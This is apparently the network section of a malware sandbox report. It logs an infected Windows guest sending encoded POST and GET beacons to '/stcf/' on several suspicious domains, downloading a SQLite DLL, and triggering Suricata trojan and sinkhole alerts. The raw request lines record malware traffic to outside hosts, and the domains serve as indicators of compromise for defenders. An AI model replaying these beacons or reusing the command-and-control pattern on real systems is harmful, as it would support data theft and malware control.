Network Analysis
- TCP Requests
-
-
192.168.56.101:49169 103.224.182.252:80www.saintprojetdesalers.com
-
192.168.56.101:49170 103.224.182.252:80www.saintprojetdesalers.com
-
192.168.56.101:49175 172.67.172.5:80www.admiralx-qjff.buzz
-
192.168.56.101:49176 172.67.172.5:80www.admiralx-qjff.buzz
-
192.168.56.101:49173 192.187.101.110:80www.hummall.com
-
192.168.56.101:49174 192.187.101.110:80www.hummall.com
-
192.168.56.101:49171 194.58.112.174:80www.ronikonmet.online
-
192.168.56.101:49172 194.58.112.174:80www.ronikonmet.online
-
192.168.56.101:49177 199.21.76.77:80www.innovativefewsustra.com
-
192.168.56.101:49178 199.21.76.77:80www.innovativefewsustra.com
-
192.168.56.101:49166 206.237.167.5:80www.houtaijiaju.com
-
192.168.56.101:49168 206.237.167.5:80www.houtaijiaju.com
-
192.168.56.101:49167 45.33.6.223:80www.sqlite.org
-
- UDP Requests
-
-
192.168.56.101:52815 164.124.101.2:53
-
192.168.56.101:53004 164.124.101.2:53
-
192.168.56.101:53850 164.124.101.2:53
-
192.168.56.101:54148 164.124.101.2:53
-
192.168.56.101:54883 164.124.101.2:53
-
192.168.56.101:55146 164.124.101.2:53
-
192.168.56.101:59002 164.124.101.2:53
-
192.168.56.101:61950 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:53853 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.101:54883
-
POST
0
http://www.houtaijiaju.com/stcf/
REQUEST
RESPONSE
BODY
POST /stcf/ HTTP/1.1
Host: www.houtaijiaju.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 172
Cache-Control: max-age=0
Origin: http://www.houtaijiaju.com
Referer: http://www.houtaijiaju.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
GET
200
http://www.sqlite.org/2021/sqlite-dll-win32-x86-3360000.zip
REQUEST
RESPONSE
BODY
GET /2021/sqlite-dll-win32-x86-3360000.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2; .NET4.0C; .NET4.0E)
Host: www.sqlite.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 18 Sep 2023 04:37:03 GMT
Last-Modified: Mon, 15 Nov 2021 22:45:13 GMT
Cache-Control: max-age=120
ETag: "m6192e2f9s87b79"
Content-type: application/zip; charset=utf-8
Content-length: 555897
GET
0
http://www.houtaijiaju.com/stcf/?Pve=1dqEu7FqG0Fk44M2SsORztBhqeVPz5dcffezXnqN6lUv5lMi6TOQp3fd1b+R5p9IBvl5i/IMrCH65j4DnfcQMtwjHinribTwYdLVWxQ=&LSiIl=htN9PL45qap
REQUEST
RESPONSE
BODY
GET /stcf/?Pve=1dqEu7FqG0Fk44M2SsORztBhqeVPz5dcffezXnqN6lUv5lMi6TOQp3fd1b+R5p9IBvl5i/IMrCH65j4DnfcQMtwjHinribTwYdLVWxQ=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.houtaijiaju.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
POST
302
http://www.saintprojetdesalers.com/stcf/
REQUEST
RESPONSE
BODY
POST /stcf/ HTTP/1.1
Host: www.saintprojetdesalers.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.saintprojetdesalers.com
Referer: http://www.saintprojetdesalers.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 302 Found
date: Mon, 18 Sep 2023 04:37:14 GMT
server: Apache
set-cookie: __tad=1695011834.2046478; expires=Thu, 15-Sep-2033 04:37:14 GMT; Max-Age=315360000
location: http://ww25.saintprojetdesalers.com/stcf/?subid1=20230918-1437-14cb-aea9-655bbf90f984
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
GET
302
http://www.saintprojetdesalers.com/stcf/?Pve=+e/LxL8BCb5JT2mwgKzbp1bNGh3lgePyU3D6l90SLvlYtUAerZBoaAu+StBCYI+EmdbaVLlpQ9qQs+tY0i0hLe/6ntyVXpS6CIyxXlk=&LSiIl=htN9PL45qap
REQUEST
RESPONSE
BODY
GET /stcf/?Pve=+e/LxL8BCb5JT2mwgKzbp1bNGh3lgePyU3D6l90SLvlYtUAerZBoaAu+StBCYI+EmdbaVLlpQ9qQs+tY0i0hLe/6ntyVXpS6CIyxXlk=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.saintprojetdesalers.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 302 Found
date: Mon, 18 Sep 2023 04:37:16 GMT
server: Apache
set-cookie: __tad=1695011836.6431378; expires=Thu, 15-Sep-2033 04:37:16 GMT; Max-Age=315360000
location: http://ww25.saintprojetdesalers.com/stcf/?Pve=+e/LxL8BCb5JT2mwgKzbp1bNGh3lgePyU3D6l90SLvlYtUAerZBoaAu+StBCYI+EmdbaVLlpQ9qQs+tY0i0hLe/6ntyVXpS6CIyxXlk=&LSiIl=htN9PL45qap&subid1=20230918-1437-1660-90cc-ced8ecde40f7
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
POST
404
http://www.ronikonmet.online/stcf/
REQUEST
RESPONSE
BODY
POST /stcf/ HTTP/1.1
Host: www.ronikonmet.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.ronikonmet.online
Referer: http://www.ronikonmet.online/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Sep 2023 04:37:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
GET
404
http://www.ronikonmet.online/stcf/?Pve=uecC1YIjKds5pfO1EToES15TCdBTvi7vIYoUJgTFy6qDYT2nEUgo5MyoghBmj6FTuqUN6uVJE1bE0H4aXubCPUG1zI5pjeamkbBuCmA=&LSiIl=htN9PL45qap
REQUEST
RESPONSE
BODY
GET /stcf/?Pve=uecC1YIjKds5pfO1EToES15TCdBTvi7vIYoUJgTFy6qDYT2nEUgo5MyoghBmj6FTuqUN6uVJE1bE0H4aXubCPUG1zI5pjeamkbBuCmA=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.ronikonmet.online
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 18 Sep 2023 04:37:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
POST
404
http://www.hummall.com/stcf/
REQUEST
RESPONSE
BODY
POST /stcf/ HTTP/1.1
Host: www.hummall.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.hummall.com
Referer: http://www.hummall.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 404 Not Found
Date: Mon, 18 Sep 2023 04:37:31 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://hummall.com/wp-json/>; rel="https://api.w.org/"
Upgrade: h2,h2c
Connection: Upgrade, close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
GET
301
http://www.hummall.com/stcf/?Pve=Nk5K1Xbn5LNktyygdQF3BnmJ+burJ+ny2OkZcNPXdwEtJdOtq79vPWmp/B6BaLcWj3tVzmTo+5PqGZIC/UTM1vSFnsb91g1hVUGRl4c=&LSiIl=htN9PL45qap
REQUEST
RESPONSE
BODY
GET /stcf/?Pve=Nk5K1Xbn5LNktyygdQF3BnmJ+burJ+ny2OkZcNPXdwEtJdOtq79vPWmp/B6BaLcWj3tVzmTo+5PqGZIC/UTM1vSFnsb91g1hVUGRl4c=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.hummall.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 04:37:34 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Upgrade: h2,h2c
Connection: Upgrade, close
Location: http://hummall.com/stcf/?Pve=Nk5K1Xbn5LNktyygdQF3BnmJ+burJ+ny2OkZcNPXdwEtJdOtq79vPWmp/B6BaLcWj3tVzmTo+5PqGZIC/UTM1vSFnsb91g1hVUGRl4c=&LSiIl=htN9PL45qap
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST
301
http://www.admiralx-qjff.buzz/stcf/
REQUEST
RESPONSE
BODY
POST /stcf/ HTTP/1.1
Host: www.admiralx-qjff.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.admiralx-qjff.buzz
Referer: http://www.admiralx-qjff.buzz/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 04:37:39 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __ddg1_=KYXyyg0KpkmtIAtzfhjy; Domain=.admiralx-qjff.buzz; HttpOnly; Path=/; Expires=Tue, 17-Sep-2024 04:37:39 GMT
Location: https://admiralx-memr.buzz/stcf/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AZnUsVto0mXRYEsH1JM0KneNtK4oFJ3uYdXWistjKE6us05lWF1PQQeGRDBC65JARhaTNgLjLkjGScYawxTNWZ2syxqPtCTSdadqCTiSvWzhWgw4CKjPtSsSlX41mEest3f3C6IwQNiL"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8086e5191a728d00-KIX
alt-svc: h2=":443"; ma=60
GET
301
http://www.admiralx-qjff.buzz/stcf/?Pve=/cN5NAnYyQNGkv6VI4g5hCl6zLANo+Uxyk0R0Gf4W9JvbRZK1NaF3DJOi9LLfoZAma38Eec3ft5h7udphOb57G+0pUhbPZipWhAdHO0=&LSiIl=htN9PL45qap
REQUEST
RESPONSE
BODY
GET /stcf/?Pve=/cN5NAnYyQNGkv6VI4g5hCl6zLANo+Uxyk0R0Gf4W9JvbRZK1NaF3DJOi9LLfoZAma38Eec3ft5h7udphOb57G+0pUhbPZipWhAdHO0=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.admiralx-qjff.buzz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 301 Moved Permanently
Date: Mon, 18 Sep 2023 04:37:42 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __ddg1_=tJNcWBEBROhJsUBunYFj; Domain=.admiralx-qjff.buzz; HttpOnly; Path=/; Expires=Tue, 17-Sep-2024 04:37:42 GMT
Location: https://admiralx-memr.buzz/stcf/?Pve=/cN5NAnYyQNGkv6VI4g5hCl6zLANo+Uxyk0R0Gf4W9JvbRZK1NaF3DJOi9LLfoZAma38Eec3ft5h7udphOb57G+0pUhbPZipWhAdHO0=&LSiIl=htN9PL45qap
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=W9P2h50L9iCZtaFsZwjK%2B%2BpbUOdsDr0oCqHSX8bMdqEaFK6aPIbNRH8KOiAMLzLbEAC%2FDR5GkWYwqjWXDjMvghjBEgXUoHn%2Fh2QnBxeil562klGt408%2FA8nhC9UcVK%2Fc4Dh6BbJbyAGK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8086e528ed901a19-KIX
alt-svc: h2=":443"; ma=60
POST
200
http://www.innovativefewsustra.com/stcf/
REQUEST
RESPONSE
BODY
POST /stcf/ HTTP/1.1
Host: www.innovativefewsustra.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 184
Cache-Control: max-age=0
Origin: http://www.innovativefewsustra.com
Referer: http://www.innovativefewsustra.com/stcf/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Sep 2023 04:37:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=401766feda9f89c0a84a4662100037c4|175.208.134.152|1695011870|1695011870|0|1|0; path=/; domain=.innovativefewsustra.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=175.208.134.152; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Content-Encoding: gzip
GET
200
http://www.innovativefewsustra.com/stcf/?Pve=KMOD9sTNx2YSpovUrRJUEzn1Yx0Z43DK6JEh/zvUzYRR0vvq/o2vdjVBrU8HPW3QMgYOZkgxf1P3X+8HybL4wtlflHnPghnD15Ngsf8=&LSiIl=htN9PL45qap
REQUEST
RESPONSE
BODY
GET /stcf/?Pve=KMOD9sTNx2YSpovUrRJUEzn1Yx0Z43DK6JEh/zvUzYRR0vvq/o2vdjVBrU8HPW3QMgYOZkgxf1P3X+8HybL4wtlflHnPghnD15Ngsf8=&LSiIl=htN9PL45qap HTTP/1.1
Host: www.innovativefewsustra.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Sep 2023 04:37:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.innovativefewsustra.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=f0323ab187659f1d86893d2c16d75572|175.208.134.152|1695011872|1695011872|0|1|0; path=/; domain=.innovativefewsustra.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=175.208.134.152; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.101 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49175 -> 172.67.172.5:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
TCP 192.168.56.101:49176 -> 172.67.172.5:80 | 2032991 | ET INFO HTTP Request to a *.buzz domain | Potentially Bad Traffic |
TCP 199.21.76.77:80 -> 192.168.56.101:49178 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | A Network Trojan was detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts